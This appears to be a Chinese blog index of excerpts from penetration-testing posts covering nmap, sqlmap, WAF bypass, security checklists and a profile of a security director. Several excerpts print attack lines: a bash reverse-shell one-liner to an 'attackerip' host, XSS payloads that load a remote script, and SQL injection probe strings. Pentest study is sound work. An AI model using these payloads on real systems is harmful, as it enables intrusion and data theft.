原创 反彈shell與生成shell

  反彈shell 0x01 bash 版本: bash -i >& /dev/tcp/attackerip/1234 0>&1 注意這個是由解析 shell 的 bash 完成,所以某些情況下不支持。我用 zsh 不能反彈。這個也是最常

原创 詳細的滲透思路(轉Mr-xn)

信息收集 服務器的相關信息(真實ip,系統類型,版本,開放端口,WAF等) 網站指紋識別(包括,cms,cdn,證書等),dns記錄 whois信息,姓名,備案,郵箱,電話反查(郵箱丟社工庫,社工準備等) 子域名收集,旁站,

原创 nmap常用命令以及腳本

轉載自:http://www.4hou.com/technology/10481.html 還有freebuf系列的文章都挺好 https://www.cnblogs.com/MacoLee/articles/5714165.html 4

原创 百個XSS-payload注入彙總

(1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG標籤XSS使用JavaScript命令 <SCRIPT SRC=http://3w.o

原创 XSS 繞過waf 姿勢

https://www.cnblogs.com/wintrysec/p/10874980.html     1.使用無害的payload,類似<b>,<i>,<u> 觀察響應,判斷應用程序是否被HTML編碼,是否標籤被過濾,是否過濾<>等

原创 ModSecurity規則

中文譯文參考:http://netsecurity.51cto.com/art/201407/446264.htm 英文原文參考:http://resources.infosecinstitute.com/configuring-mods

原创 nmap-腳本

轉載自:http://www.4hou.com/technology/10481.html 還有freebuf系列的文章都挺好 補充: Metasploit結合Nmap(lua語言) nmap -sS -p 3389 -oG- 221.0

原创 sql注入payload

分享一些平時測試用的sql payloads 1:BOOL SQLINJECTION \ ' " %df' %df" and 1=1 and 1=2 ' and '1'='1 ' and '1'='2 " and "1"="1 " an

原创 sqlmap命令

cookie注入:sqlmap.py -u 注入點 --cookie "參數" --tables --level 2 POST登錄框注入:sqlmap.py -r 從文件讀取數據 -p 指定的參數 --tables            

原创 sqlmap命令2

sqlmap簡介 sqlmap支持五種不同的注入模式: 1、基於布爾的盲注,即可以根據返回頁面判斷條件真假的注入。 2、基於時間的盲注,即不能根據頁面返回內容判斷任何信息,用條件語句查看時間延遲語句是否執行(即頁面返回時間是否增加)來判斷

原创 sqlmap命令3

當給sqlmap這麼一個url (http://www.target.com/sqlmap/mysql/get_int.php?id=1) 的時候,它會: 1、判斷可注入的參數 2、判斷可以用那種SQL注入技術來注入 3、識別出哪種

原创 滲透測試工具實戰技巧合集

最好的 NMAP 掃描策略 # 適用所有大小網絡最好的 nmap 掃描策略 # 主機發現,生成存活主機列表 $ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24 $ grep "Stat

原创 分享國外安全團隊及工具

名稱        版        描述        主頁 0trace        1.5        跳躍枚舉工具        http://jon.oberheide.org/0trace/ 3proxy        0

原创 人物-攜程凌雲

冬日的上午,安在CEO張耀疆和我在上海凌空SOHO攜程辦公區,見到了攜程信息安全高級總監凌雲。   初見凌雲,清瘦的身形,秀氣的容貌,還有一嗓子洪亮的話音,完全是一個二十多歲的小夥子。然而出乎我意料的是,凌雲說他已經在奔四的道路上一去不復

原创 安全測試CheckList

權限系統 保證全部資源都使用HTTPS 登出之後銷燬會話ID 密碼重置後需要銷燬所有活躍會話 使用httponly Cookies 密碼找回等無需登錄的場景下下達到用戶認證字符串必須是該場景單獨使用的,須確保無法在其他任何場景完成認證 敏